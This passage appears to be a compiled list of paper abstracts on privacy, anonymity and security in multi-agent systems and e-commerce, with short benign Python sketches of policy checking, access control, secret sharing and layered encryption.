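    if stmt.purposes & prefs.blocked_purposes:
        return False
    return RETENTION_ORDER.index(stmt.retention) <= RETENTION_ORDER.index(prefs.max_retention)

prefs = UserPreferences(blocked_purposes={"marketing"},
                        max_retention="stated_purpose",
                        sensitive_items={"health_record"})
stmt = PolicyStatement(data_items={"email"},
                       purposes={"current_transaction"},
                       retention="stated_purpose")
print(acceptable(stmt, prefs))   # True: no blocked purpose, retention within bounds
```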
--- paper_title: Privacy-Aware Autonomous Agents for Pervasive Healthcare paper_content: Hospitals are convenient settings for deploying pervasive computing technology, but they also raise important privacy concerns. Hospital work imposes significant demands on staff, including high availability, careful attention to patients, confidentiality, rapid response to emergencies, and constant coordination with colleagues. These demands shape the way hospital workers experience and understand privacy. In addition, healthcare professionals experience a high level of mobility because they must collaborate with colleagues and access information and artifacts distributed throughout the premises. Autonomous agents can help developers design privacy-aware systems that handle the threats raised by pervasive technology. --- paper_title: Information Sharing among Autonomous Agents in Referral Networks paper_content: Referral networks are a kind of P2P system consisting of autonomous agents who seek and provide services, or refer other service providers. Key applications include service discovery and selection, and knowledge sharing. An agent seeking a service contacts other agents to discover suitable service providers. An agent who is contacted may autonomously ignore the request or respond by providing the desired service or giving a referral. This use of referrals is inspired by human interactions, where referrals are a key basis for judging the trustworthiness of a given service. The use of referrals differentiates such networks from traditional P2P information sharing systems, which are based on request flooding. Not only does the use of referrals enable an agent to control how its request is processed, it also provides an architectural basis for four kinds of interaction policies. InterPol is a language and framework supporting such policies. InterPol provides an ability to specify requests with hard and soft constraints as well as a vocabulary of application-independent terms based on interaction concepts. Using these, InterPol enables agents to reveal private information and accept others' information based on subtle relationships. In this manner, InterPol goes beyond traditional referral and other P2P systems in supporting practical applications. InterPol has been implemented using a Datalog-based policy engine for each agent. It has been applied to scenarios from a (multinational) health care project. The contribution of this paper is in a general referrals-based architecture for information sharing among autonomous agents, which is shown to effectively capture a variety of privacy and trust requirements of autonomous users. --- paper_title: HIPPOCRATIC MULTI-AGENT SYSTEMS paper_content: The current evolution of Information Technology leads to the increase of automatic data processing over multiple information systems. In this context, the lack of users' control over their personal data leads to the crucial question of their privacy preservation. A typical example concerns the disclosure of confidential identity information without the owner's agreement. This problem is stressed in multi-agent systems (MAS), where users delegate control over their personal data to autonomous agents. Interaction being one of the main mechanisms in MAS, sensitive information exchange and processing are a key issue with respect to privacy. In this article, we propose a model, ”Hippocratic Multi-Agent System” (HiMAS), to tackle this problem.
This model defines a set of principles bearing on an agency to preserve privacy. In order to illustrate our model, we have chosen the concrete application of decentralized calendar management. --- paper_title: A Utility-Theoretic Approach to Privacy and Personalization paper_content: Online services such as web search, news portals, and e-commerce applications face the challenge of providing high-quality experiences to a large, heterogeneous user base. Recent efforts have highlighted the potential to improve performance by personalizing services based on special knowledge about users. For example, a user's location, demographics, and search and browsing history may be useful in enhancing the results offered in response to web search queries. However, reasonable concerns about privacy on the part of users, providers, and government agencies acting on behalf of citizens may limit access to such information. We introduce and explore an economics of privacy in personalization, where people can opt to share personal information in return for enhancements in the quality of an online service. We focus on the example of web search and formulate realistic objective functions for search efficacy and privacy. We demonstrate how we can identify a near-optimal solution to the utility-privacy tradeoff. We evaluate the methodology on data drawn from a log of the search activity of volunteer participants. We separately assess users' preferences about privacy and utility via a large-scale survey, aimed at eliciting preferences about people's willingness to trade the sharing of personal data in return for gains in search efficiency. We show that a significant level of personalization can be achieved using only a small amount of information about users. --- paper_title: Trading privacy for trust paper_content: Both privacy and trust relate to knowledge about an entity. However, there is an inherent conflict between trust and privacy: the more a first entity knows about a second entity, the more accurate its trustworthiness assessment should be; but the more that is known about this second entity, the less privacy is left to it. This conflict needs to be addressed because both trust and privacy are essential elements for a smart working world. The solution should allow the benefit of adjunct trust when entities interact without too much privacy loss. We propose to achieve the right trade-off between trust and privacy by ensuring minimal trade of privacy for the required trust. We demonstrate how transactions made under different pseudonyms can be linked, and how careful disclosure of such links fulfils this trade-off. --- paper_title: Self-disclosure decision making based on intimacy and privacy paper_content: Autonomous agents may encapsulate their principals' personal data attributes. These attributes may be disclosed to other agents during agent interactions, producing a loss of privacy. Thus, agents need self-disclosure decision-making mechanisms to autonomously decide whether disclosing personal data attributes to other agents is acceptable or not. Current self-disclosure decision-making mechanisms consider the direct benefit and the privacy loss of disclosing an attribute. However, there are many situations in which the direct benefit of disclosing an attribute is a priori unknown. This is the case in human relationships, where the disclosure of personal data attributes plays a crucial role in their development.
In this paper, we present self-disclosure decision-making mechanisms based on psychological findings regarding how humans disclose personal information in the building of their relationships. We experimentally demonstrate that, in most situations, agents following these decision-making mechanisms lose less privacy than agents that do not use them. --- paper_title: Network Security Essentials: Applications and Standards paper_content: In this age of electronic connectivity, of viruses and hackers, of electronic eavesdropping and electronic fraud, network security has assumed increasing importance. Two trends have come together to make the topic of this book of vital interest. First, the explosive growth in computer systems and their interconnections via networks has increased the dependence of both organizations and individuals on the information stored and communicated using these systems. This, in turn, has led to a heightened awareness of the need to protect data and resources from disclosure, to guarantee the authenticity of data and messages, and to protect systems from network-based attacks. Second, the disciplines of cryptography and network security have matured, leading to the development of practical, readily available applications to enforce network security. The purpose of the book is to provide a practical survey of network security applications and standards, with emphasis on applications that are widely used on the Internet and for corporate networks, and on standards, especially Internet standards, that have been widely deployed. It is intended for both an academic and a professional audience and is organized in three parts: Cryptography, a concise survey of the cryptographic algorithms and protocols underlying network security applications, including encryption, hash functions, digital signatures, and key exchange; Network Security Applications, covering important network security tools and applications, including Kerberos, X.509v3 certificates, PGP, S/MIME, IP Security, SSL/TLS, SET, and SNMPv3; and System Security, which examines system-level security issues, including the threat of and countermeasures for intruders and viruses, and the use of firewalls and trusted systems. The book also includes an extensive glossary, a list of frequently used acronyms, a bibliography, end-of-chapter problems, suggestions for further reading, and a companion Web page for students and instructors.
--- paper_title: Managing business with electronic commerce : issues and trends paper_content: Because the field of electronic commerce has continued to expand so significantly in recent years, it has become necessary for businesses and organizations to address ways to develop successful business applications that aid in its effective utilization. This work addresses this important need and is intended for students, practitioners, researchers and also a general audience with an interest in this field. --- paper_title: A performance evaluation of three multiagent platforms paper_content: In the last few years, many researchers have focused on testing the performance of Multiagent Platforms. Results obtained show a lack of performance and scalability on current Multiagent Platforms, but the existing research does not tackle the causes of this poor efficiency. This article is aimed not only at testing the performance of Multiagent Platforms but also at discovering the Multiagent Platform design decisions that can lead to these deficiencies. Therefore, we are able to understand to what extent the internal design of a Multiagent Platform affects its performance. The experiments performed are focused on the features involved in agent communication. --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. While security has been a focus of the MAS community, configuring and managing such multi agent systems typically remains non-trivial. Well defined and easily configurable security policies address this issue. A security architecture that is both flexible and featureful is prerequisite for a MAS. A novel security policy enforcement system for multi agent middleware systems is introduced. The system facilitates a set of good default configurations but also allows extensive scope for users to develop customised policies to suit their individual needs. An agent middleware, AgentScape, is used to illustrate the system. --- paper_title: A Secure Mobile Agents Platform paper_content: Mobile Agents is a new paradigm for distributed computing where security is essential to the acceptance of this paradigm in a large-scale distributed environment. In this paper, we propose protection mechanisms for mobile agents. In these mechanisms, the authentication of mobile agents and the access control to the system resources are controlled by the mobile-agents platform. Each agent defines its own access control policy with regard to other agents using an Interface Definition Language (IDL), thus enforcing modularity and easing the programming task. An evaluation of these mechanisms has been conducted. The measurements give the overhead added by the proposed protection mechanisms to the performance of mobile agents. Important advantages of our protection mechanisms are transparency to agents and the portability of nonsecure applications onto a secure environment. A mobile agent system and the protection mechanisms have been implemented. Our experiments have shown the feasibility and the advantages of our mechanisms.
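As a loose illustration of the platform-enforced, per-agent access control described in the "A Secure Mobile Agents Platform" entry above, the following minimal Python sketch shows how such checks could look. The policy structure, class names, and operations are invented for illustration; they are not the paper's IDL-based mechanism.

```python
# Illustrative sketch: each agent declares which operations other agents may
# invoke on it, and the platform checks the policy before dispatching a call.
from dataclasses import dataclass, field

@dataclass
class AgentPolicy:
    owner: str
    # allowed[caller] -> set of operations that caller may invoke on `owner`
    allowed: dict = field(default_factory=dict)

    def permits(self, caller: str, operation: str) -> bool:
        return operation in self.allowed.get(caller, set())

class Platform:
    """Platform-side enforcement point: every call is checked, transparently to agents."""
    def __init__(self):
        self.policies = {}

    def register(self, policy: AgentPolicy):
        self.policies[policy.owner] = policy

    def invoke(self, caller: str, target: str, operation: str):
        if not self.policies[target].permits(caller, operation):
            raise PermissionError(f"{caller} may not call {operation} on {target}")
        return f"{operation} executed on {target} for {caller}"

platform = Platform()
platform.register(AgentPolicy("seller_agent", {"buyer_agent": {"get_quote"}}))
print(platform.invoke("buyer_agent", "seller_agent", "get_quote"))   # allowed
# platform.invoke("buyer_agent", "seller_agent", "read_inventory")   # would raise PermissionError
```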
--- paper_title: ADK: An Agent Development Kit Based on a Formal Design Model for Multi-Agent Systems paper_content: The advent of multi-agent systems has brought us opportunities for the development of complex software that will serve as the infrastructure for advanced distributed applications. During the past decade, there have been many agent architectures proposed for implementing agent-based systems, and also a few efforts to formally specify agent behaviors. However, research on narrowing the gap between agent formal models and agent implementation is rare. In this paper, we propose a model-based approach to designing and implementing intelligent agents for multi-agent systems (MAS). Instead of using formal methods for the purpose of specifying agent behavior, we bring formal methods into the design phase of the agent development life cycle. Specifically, we use the formalism called agent-oriented G-net model, which is based on the G-net formalism (a type of high-level Petri net), to serve as the high-level design for intelligent agents. Based on the high-level design, we further derived the agent architecture and the detailed design for agent implementation. To demonstrate the feasibility of our approach, we developed the toolkit called ADK (Agent Development Kit) that supports rapid development of intelligent agents for multi-agent systems and we discuss the role of inheritance in agent-oriented development. As a potential solution for automated software development, we summarize the procedure to generate a model-based design of application-specific agents. Finally, to illustrate an application built on ADK, we present an air-ticket trading example. --- paper_title: Concepts and architecture of a security-centric mobile agent server paper_content: Mobile software agents are software components that are able to move in a network. They are often considered as an attractive technology in electronic commerce applications. Although security concerns prevail. We describe the architecture and concepts of the SeMoA server-a runtime environment for Java-based mobile agents. Its architecture has a focus on security and easy extendability, and offers a framework for transparent content inspection of agents by means of filters. We implemented filters that handle agent signing and authentication as well as selective encryption of agent contents. Filters are applied transparently such that agents need not be aware of the security services provided by the server. --- paper_title: A group-oriented secure multiagent platform paper_content: Security is becoming a major concern in multiagent systems, since an agent's incorrect or inappropriate behaviour may cause non-desired effects, such as money and data loss. Some multiagent platforms (MAP) are now providing baseline security features, such as authentication, authorization, integrity and confidentiality. However, they fail to support other features related to the sociability skills of agents such as agent groups. What is more, none of the listed MAPs provide a mechanism for preserving the privacy of the users (regarding their identities) that run their agents on such MAPs. In this paper, we present the security infrastructure (SI) of the Magentix MAP, which supports agent groups and preserves user identity privacy. The SI is based on identities that are assigned to all the different entities found in Magentix (users, agents and agent groups). 
We also provide an evaluation of the SI describing an example application built on top of Magentix and a performance evaluation of it. Copyright © 2010 John Wiley & Sons, Ltd. --- paper_title: Privacy protection in electronic commerce – a theoretical framework paper_content: In this paper, a theoretical framework for privacy protection in electronic commerce is provided. This framework allows us to identify the key players and their interactions in the context of privacy violation and protection. It also helps to discover the responsibilities of the key players and areas for further research. --- paper_title: The Froehlich/Kent encyclopedia of telecommunications paper_content: "Wireless Multiple Access Adaptive Communications Technique, Gregory J. Pottie Wireless Networking, Asuncion Satamaria and F. J. Lopez-Hernandez Wireless Packet Data Technology, Apostolis K. Salkintzis and Christodoulos Chamzas Wireless Radio Software Architecture, Joseph Mitola Wireless Receivers Using Digitization at the RF or IF, Jeffrey A. Wepman Wireline and Wireless Applications for Intelligent Transportation Systems, Kevin Needham, Matthew McDonald, and Matthew Hardison Workbench for Security Officers, Allison Anderson, Lam For Kwok, and Dennis Longley World Wide Web and Internet Numbering and Naming Systems, Jon Postel and Joyce K. Reynolds The World Wide Web (WWW) and Secure Electronic Commerce, S. H. Von Solms Zworykin, Vladimir Kosma, Joyce E. Bedi Epilogue---New Communications Services---What Does Society Want?, Robert W. Lucky " --- paper_title: An agent-based approach for privacy-preserving recommender systems paper_content: Recommender Systems are used in various domains to generate personalized information based on personal user data. The ability to preserve the privacy of all participants is an essential requirement of the underlying Information Filtering architectures, because the deployed Recommender Systems have to be accepted by privacy-aware users as well as information and service providers. Existing approaches neglect to address privacy in this multilateral way. We have developed an approach for privacy-preserving Recommender Systems based on Multiagent System technology which enables applications to generate recommendations via various filtering techniques while preserving the privacy of all participants. We describe the main modules of our solution as well as an application we have implemented based on this approach. --- paper_title: Privacy-preserving demographic filtering paper_content: The use of recommender systems in e-commerce to guide customer choices presents a privacy protection problem that is twofold. We seek to protect the privacy interests of customers by trying to keep private their identity and demographic characteristics, and possibly also their buying preferences and behaviour. This can be desirable even if anonymity is used. Furthermore, we want to protect the commercial interests of the e-commerce service providers by allowing them to make recommendations as accurate as possible, without unnecessarily revealing valuable information they have legitimately accumulated, such as market trends, to third parties.In this paper, we concentrate on recommender systems based on demographic filtering, which make recommendations based on feedback of previous users of similar demographic characteristics (such as age, sex, level of education, wealth, geographical location, etc.). 
We propose a system called ALAMBIC, which adequately achieves the above privacy-protection objectives in this kind of recommender systems. Our system is based on a semi-trusted third party in which the users need only have limited confidence. A main originality of our approach is to split user data between that party and the service provider in such a way that neither can derive sensitive information from their share alone. --- paper_title: A Taxonomy of Privacy paper_content: Privacy is a concept in disarray. Nobody can articulate what it means. As one commentator has observed, privacy suffers from an embarrassment of meanings. Privacy is far too vague a concept to guide adjudication and lawmaking, as abstract incantations of the importance of privacy do not fare well when pitted against more concretely-stated countervailing interests. In 1960, the famous torts scholar William Prosser attempted to make sense of the landscape of privacy law by identifying four different interests. But Prosser focused only on tort law, and the law of information privacy is significantly more vast and complex, extending to Fourth Amendment law, the constitutional right to information privacy, evidentiary privileges, dozens of federal privacy statutes, and hundreds of state statutes. Moreover, Prosser wrote over 40 years ago, and new technologies have given rise to a panoply of new privacy harms. A new taxonomy to understand privacy violations is thus sorely needed. This article develops a taxonomy to identify privacy problems in a comprehensive and concrete manner. It endeavors to guide the law toward a more coherent understanding of privacy and to serve as a framework for the future development of the field of privacy law. --- paper_title: Engineering Privacy paper_content: In this paper we integrate insights from diverse islands of research on electronic privacy to offer a holistic view of privacy engineering and a systematic structure for the discipline's topics. First we discuss privacy requirements grounded in both historic and contemporary perspectives on privacy. We use a three-layer model of user privacy concerns to relate them to system operations (data transfer, storage and processing) and examine their effects on user behavior. In the second part of the paper we develop guidelines for building privacy-friendly systems. We distinguish two approaches: "privacy-by-policy" and "privacy-by-architecture." The privacy-by-policy approach focuses on the implementation of the notice and choice principles of fair information practices (FIPs), while the privacy-by-architecture approach minimizes the collection of identifiable personal data and emphasizes anonymization and client-side data storage and processing. We discuss both approaches with a view to their technical overlaps and boundaries as well as to economic feasibility. The paper aims to introduce engineers and computer scientists to the privacy research domain and provide concrete guidance on how to design privacy-friendly systems. --- paper_title: Anonymity and software agents: An interdisciplinary challenge paper_content: Software agents that play a role in E-commerce and E-government applications involving the Internet often contain information about the identity of their human user such as credit cards and bank accounts. 
This paper discusses whether this is necessary: whether human users and software agents are allowed to be anonymous under the relevant legal regimes and whether an adequate interaction and balance between law and anonymity can be realised from both the perspective of Computer Systems and the perspective of Law. --- paper_title: Anonymity Metrics Revisited paper_content: In 2001, two information theoretic anonymity metrics were proposed: the "effective anonymity set size" and the "degree of anonymity". In this talk, we propose an abstract model for a general anonymity system which is consistent with the definition of anonymity on which the metrics are based. We revisit entropy-based anonymity metrics, and we apply them to Crowds, a practical ::: anonymity system. We discuss the differences between the two metrics ::: and the results obtained in the example. --- paper_title: Analysis of Privacy Loss in Distributed Constraint Optimization paper_content: Distributed Constraint Optimization (DCOP) is rapidly emerging as a prominent technique for multi agent coordination. However, despite agent privacy being a key motivation for applying DCOPs in many applications, rigorous quantitative evaluations of privacy loss in DCOP algorithms have been lacking. Recently, [Maheswaran et al. 2005] introduced a framework for quantitative evaluations of privacy in DCOP algorithms, showing that some DCOP algorithms lose more privacy than purely centralized approaches and questioning the motivation for applying DCOPs. This paper addresses the question of whether state-of-the art DCOP algorithms suffer from a similar shortcoming by investigating several of the most efficient DCOP algorithms, including both DPOP and ADOPT. Furthermore, while previous work investigated the impact on efficiency of distributed contraint reasoning design decisions (e.g. constraint-graph topology, asynchrony, message-contents), this paper examines the privacy aspect of such decisions, providing an improved understanding of privacy-efficiency tradeoffs. --- paper_title: Privacy Loss in Distributed Constraint Reasoning: A Quantitative Framework for Analysis and its Applications paper_content: It is critical that agents deployed in real-world settings, such as businesses, offices, universities and research laboratories, protect their individual users' privacy when interacting with other entities. Indeed, privacy is recognized as a key motivating factor in the design of several multiagent algorithms, such as in distributed constraint reasoning (including both algorithms for distributed constraint optimization (DCOP) and distributed constraint satisfaction (DisCSPs)), and researchers have begun to propose metrics for analysis of privacy loss in such multiagent algorithms. Unfortunately, a general quantitative framework to compare these existing metrics for privacy loss or to identify dimensions along which to construct new metrics is currently lacking. This paper presents three key contributions to address this shortcoming. First, the paper presents VPS (Valuations of Possible States), a general quantitative framework to express, analyze and compare existing metrics of privacy loss. Based on a state-space model, VPS is shown to capture various existing measures of privacy created for specific domains of DisCSPs. The utility of VPS is further illustrated through analysis of privacy loss in DCOP algorithms, when such algorithms are used by personal assistant agents to schedule meetings among users. 
In addition, VPS helps identify dimensions along which to classify and construct new privacy metrics and it also supports their quantitative comparison. Second, the article presents key inference rules that may be used in analysis of privacy loss in DCOP algorithms under different assumptions. Third, detailed experiments based on the VPS-driven analysis lead to the following key results: (i) decentralization by itself does not provide superior protection of privacy in DisCSP/DCOP algorithms when compared with centralization; instead, privacy protection also requires the presence of uncertainty about agents' knowledge of the constraint graph; (ii) one needs to carefully examine the metrics chosen to measure privacy loss, since the qualitative properties of privacy loss, and hence the conclusions that can be drawn about an algorithm, can vary widely based on the metric chosen. This paper should thus serve as a call to arms for further privacy research, particularly within the DisCSP/DCOP arena. --- paper_title: Distributed constraint satisfaction and optimization with privacy enforcement paper_content: Several naturally distributed negotiation/cooperation problems with privacy requirements can be modeled within the distributed constraint satisfaction framework, where the constraints are secrets of the participants. Most of the existing techniques aim at various tradeoffs between complexity and privacy guarantees, while others aim to maximize privacy first, according to Yokoo et al. (2002), Silaghi (2003), Faltings (2003), Liu et al. (2002) and Wallace and Silaghi (2004). In Silaghi (2003) we introduced a first technique allowing agents to solve distributed constraint problems (DisCSPs) without revealing anything and without trusting each other or some server. The technique we propose now is a dm times improvement for m variables of domain size d. On the negative side, the fastest versions of the technique require storing O(d^m) big integers. From a practical point of view, we improve the privacy with which these problems can be solved, and improve the efficiency with which ⌊(n-1)/2⌋-privacy can be achieved, while it remains inapplicable for larger problems. The technique of Silaghi (2003) has a simple extension to optimization for distributed weighted CSPs. However, that obvious extension leaks to everybody sensitive information concerning the quality of the computed solution. We found a way to avoid this leak, which constitutes another contribution of this work. --- paper_title: SSDPOP: improving the privacy of DCOP with secret sharing paper_content: Multiagent systems designed to work collaboratively with groups of people typically require private information that people will entrust to them only if they have assurance that this information will be protected. Although Distributed Constraint Optimization (DCOP) has emerged as a prominent technique for multiagent coordination, existing algorithms for solving DCOP problems do not adequately protect agents' privacy. This paper analyzes privacy protection and loss in existing DCOP algorithms. It presents a new algorithm, SSDPOP, which augments a prominent DCOP algorithm (DPOP) with secret sharing techniques. This approach significantly reduces privacy loss, while preserving the structure of the DPOP algorithm and introducing only minimal computational overhead. Results show that SSDPOP reduces privacy loss by 29--88% on average over DPOP.
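The SSDPOP entry above augments DPOP with secret sharing. The sketch below illustrates the underlying primitive, (t, n) Shamir secret sharing over a prime field, with which an agent could split a private valuation into shares that only a threshold of recipients can jointly reconstruct. It is a toy illustration under assumed parameters (field prime, share counts); it is not the SSDPOP implementation.

```python
# Minimal (t, n) Shamir secret sharing sketch: split a private value into n
# shares so that any t of them reconstruct it and fewer reveal nothing.
import random

PRIME = 2**61 - 1  # Mersenne prime, large enough for small utility values (assumption)

def split_secret(secret, n_shares, threshold):
    """Evaluate a random degree-(threshold-1) polynomial with constant term `secret`."""
    coeffs = [secret] + [random.randrange(PRIME) for _ in range(threshold - 1)]
    shares = []
    for x in range(1, n_shares + 1):
        y = 0
        for power, c in enumerate(coeffs):
            y = (y + c * pow(x, power, PRIME)) % PRIME
        shares.append((x, y))
    return shares

def reconstruct(shares):
    """Lagrange interpolation at x = 0 recovers the secret from any t shares."""
    secret = 0
    for i, (xi, yi) in enumerate(shares):
        num, den = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                num = (num * (-xj)) % PRIME
                den = (den * (xi - xj)) % PRIME
        secret = (secret + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
    return secret

if __name__ == "__main__":
    private_cost = 42  # an agent's private constraint cost (toy value)
    shares = split_secret(private_cost, n_shares=5, threshold=3)
    print(reconstruct(shares[:3]))  # -> 42 from any 3 of the 5 shares
```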
--- paper_title: Secure Distributed Constraint Satisfaction: Reaching Agreement without Revealing Private Information paper_content: This paper develops a secure distributed Constraint Satisfaction algorithm. A Distributed Constraint Satisfaction Problem (DisCSP) is a CSP in which variables and constraints are distributed among multiple agents. A major motivation for solving a DisCSP without gathering all information in one server is the concern about privacy/security. However, existing DisCSP algorithms leak some information during the search process and privacy/security issues are not dealt with formally. Our newly developed algorithm utilizes a public key encryption scheme. In this algorithm, multiple servers, which receive encrypted information from agents, cooperatively perform a search process that is equivalent to a standard chronological backtracking. This algorithm does not leak any private information, i.e., neither agents nor servers can obtain any additional information on the value assignment of variables that belong to other agents. --- paper_title: Onion Routing for Anonymous and Private Internet Connections paper_content: Abstract : Preserving privacy means not only hiding the content of messages, but also hiding who is talking to whom (traffic analysis). Much like a physical envelope, the simple application of cryptography within a packet-switched network hides the messages being sent, but can reveal who is talking to whom, and how often. Onion Routing is a general purpose infrastructure for private communication over a public network [8, 9, 4]. It provides anonymous connections that are strongly resistant to both eavesdropping and traffic analysis. The connections are bidirectional, near real-time, and can be used for both connection-based and connectionless traffic. Onion Routing interfaces with off the shelf software and systems through specialized proxies, making it easy to integrate into existing systems. Prototypes have been running since July 1997. As of this article's publication, the prototype network is processing more than 1 million Web connections per month from more than six thousand IP addresses in twenty countries and in all six main top level domains. [7] --- paper_title: Anonymous Communications for Mobile Agents paper_content: Anonymous communication techniques are vital for some types of e-commerce applications. There have been several different approaches developed for providing anonymous communication over the Internet. In this paper, we review key techniques for anonymous communication and describe an alternate anonymous networking approach based on agile agents intended to provide anonymous communication protection for mobile agent systems. --- paper_title: IntelliShopper: a proactive, personal, private shopping assistant paper_content: The IntelliShopper is a shopping assistant designed to empower consumers. It is a personal assistant in that it observes the users while shopping and learns their preferences with respect to various features that characterize shopping items. It is proactive in that it remembers the users' requests and autonomously monitors vendor sites for new items that might match the users' needs and preferences. Finally, it protects users' privacy by means of pseudonymity, IP anony\-mizing, and trusted filtering. Pseudonymity is achieved through the use of personae; we show that this approach also behooves successful classification. 
IP anonymizing can be performed in at least two manners, which we discuss and compare in the context of our application. Trusted filtering --- as opposed to merchant-based filtering --- improves privacy by allowing users to select their preferred privacy representative. This paper introduces the IntelliShopper system, discusses its architecture and components, describes a prototype implementation, and outlines preliminary evaluations of its performance. --- paper_title: Untraceable electronic mail, return addresses, and digital pseudonyms paper_content: A technique based on public key cryptography is presented that allows an electronic mail system to hide who a participant communicates with as well as the content of the communication - in spite of an unsecured underlying telecommunication system. The technique does not require a universally trusted authority. One correspondent can remain anonymous to a second, while allowing the second to respond via an untraceable return address. The technique can also be used to form rosters of untraceable digital pseudonyms from selected applications. Applicants retain the exclusive ability to form digital signatures corresponding to their pseudonyms. Elections in which any interested party can verify that the ballots have been properly counted are possible if anonymously mailed ballots are signed with pseudonyms from a roster of registered voters. Another use allows an individual to correspond with a record-keeping organization under a unique pseudonym, which appears in a roster of acceptable clients. --- paper_title: Tor: The Second-Generation Onion Router paper_content: We present Tor, a circuit-based low-latency anonymous communication service. This second-generation Onion Routing system addresses limitations in the original design by adding perfect forward secrecy, congestion control, directory servers, integrity checking, configurable exit policies, and a practical design for location-hidden services via rendezvous points. Tor works on the real-world Internet, requires no special privileges or kernel modifications, requires little synchronization or coordination between nodes, and provides a reasonable tradeoff between anonymity, usability, and efficiency. We briefly describe our experiences with an international network of more than 30 nodes. We close with a list of open problems in anonymous communication. --- paper_title: Design and Implementation of a Secure Multi-Agent Marketplace paper_content: A multi-agent marketplace, MAGNET (Multi AGent Negotiation Testbed), is a promising solution for conducting online combinatorial auctions. The trust model of MAGNET is somewhat different from other on-line auction systems, since the marketplace, which mediates all communications between agents, acts as a partially trusted third party. In this paper, we identify the security vulnerabilities of MAGNET and present a solution that overcomes these weaknesses. Our solution makes use of three different existing technologies with standard cryptographic techniques: a publish/subscribe system to provide simple and general messaging, time-release cryptography to provide guaranteed nondisclosure of the bids, and anonymous communication to hide the identity of the bidders until the end of the auction. By doing so, we successfully minimize the trust on the market as well as increase the security of the whole system. The protocol that we have developed can be adapted for use by other agent-based auction systems, which use a third party to mediate transactions.
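The Chaum mix and Tor entries above both rest on layered encryption, in which each relay strips exactly one layer and learns only the next hop. The sketch below illustrates that layering idea using symmetric Fernet keys from the Python cryptography package; real mixes and onion routers use public-key cryptography, telescoping circuits, and per-hop routing headers, so this is only a conceptual toy under assumed relay names and a fixed route.

```python
# Toy illustration of layered ("onion") encryption: the message is wrapped
# once per relay, and each relay peels a single layer with its own key.
from cryptography.fernet import Fernet

relays = ["relay_A", "relay_B", "relay_C"]             # assumed route
keys = {name: Fernet.generate_key() for name in relays}

def wrap(message: bytes, route):
    """Encrypt for the exit relay first, then wrap backwards toward the entry relay."""
    onion = message
    for name in reversed(route):
        onion = Fernet(keys[name]).encrypt(onion)
    return onion

def unwrap(onion: bytes, route):
    """Each relay, in forwarding order, removes exactly one layer with its own key."""
    for name in route:
        onion = Fernet(keys[name]).decrypt(onion)
    return onion

packet = wrap(b"GET /private-resource", relays)
assert unwrap(packet, relays) == b"GET /private-resource"
```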
--- paper_title: Security without identification: transaction systems to make big brother obsolete paper_content: The large-scale automated transaction systems of the near future can be designed to protect the privacy and maintain the security of both individuals and organizations. --- paper_title: User centricity: a taxonomy and open issues paper_content: User centricity is a significant concept in federated identity management (FIM), as it provides for stronger user control and privacy. However, several notions of user-centricity in the FIM community render its semantics unclear and hamper future research in this area. Therefore, we consider user-centricity abstractly and establish a comprehensive taxonomy encompassing user-control, architecture, and usability aspects of user-centric FIM. On the systems layer, we discuss user-centric FIM systems and classify them into two predominant variants with significant feature sets. We distinguish credential-focused systems, which advocate offline identity providers and long-term credentials at a user's client, and relationship-focused systems, which rely on the relationships between users and online identity providers that create short-term credentials during transactions. Note that these two notions of credentials are quite different: the former encompasses cryptographic credentials as defined by Lysyanskaya et al. [30], the latter federation tokens as used in today's FIM protocols like Liberty. We raise the question where user-centric FIM systems may go, within the limitations of the user-centricity paradigm as well as beyond them. Firstly, we investigate the existence of a universal user-centric FIM system that can achieve a superset of security and privacy properties as well as the characteristic features of both predominant classes. Secondly, we explore the feasibility of reaching beyond user-centricity, that is, allowing a user of a user-centric FIM system to again give away user-control by means of an explicit act of delegation. We do neither claim a solution for universal user-centric systems nor for the extension beyond the boundaries ventured by leveraging the properties of a credential-focused FIM system.
--- paper_title: An agent-based approach for privacy-preserving recommender systems paper_content: Recommender Systems are used in various domains to generate personalized information based on personal user data. The ability to preserve the privacy of all participants is an essential requirement of the underlying Information Filtering architectures, because the deployed Recommender Systems have to be accepted by privacy-aware users as well as information and service providers. Existing approaches neglect to address privacy in this multilateral way. We have developed an approach for privacy-preserving Recommender Systems based on Multiagent System technology which enables applications to generate recommendations via various filtering techniques while preserving the privacy of all participants. We describe the main modules of our solution as well as an application we have implemented based on this approach. --- paper_title: Privacy-preserving demographic filtering paper_content: The use of recommender systems in e-commerce to guide customer choices presents a privacy protection problem that is twofold. We seek to protect the privacy interests of customers by trying to keep private their identity and demographic characteristics, and possibly also their buying preferences and behaviour. This can be desirable even if anonymity is used. Furthermore, we want to protect the commercial interests of the e-commerce service providers by allowing them to make recommendations as accurate as possible, without unnecessarily revealing valuable information they have legitimately accumulated, such as market trends, to third parties.In this paper, we concentrate on recommender systems based on demographic filtering, which make recommendations based on feedback of previous users of similar demographic characteristics (such as age, sex, level of education, wealth, geographical location, etc.). We propose a system called ALAMBIC, which adequately achieves the above privacy-protection objectives in this kind of recommender systems. Our system is based on a semi-trusted third party in which the users need only have limited confidence. A main originality of our approach is to split user data between that party and the service provider in such a way that neither can derive sensitive information from their share alone. --- paper_title: Enforcing security in the AgentScape middleware paper_content: Multi Agent Systems (MAS) provide a useful paradigm for accessing distributed resources in an autonomic and self-directed manner. Resources, such as web services, are increasingly becoming available in large distributed environments. Currently, numerous multi agent systems are available. However, for the multi agent paradigm to become a genuine mainstream success certain key features need to be addressed: the foremost being security. While security has been a focus of the MAS community, configuring and managing such multi agent systems typically remains non-trivial. Well defined and easily configurable security policies address this issue. A security architecture that is both flexible and featureful is prerequisite for a MAS. A novel security policy enforcement system for multi agent middleware systems is introduced. The system facilitates a set of good default configurations but also allows extensive scope for users to develop customised policies to suit their individual needs. An agent middleware, AgentScape, is used to illustrate the system. 
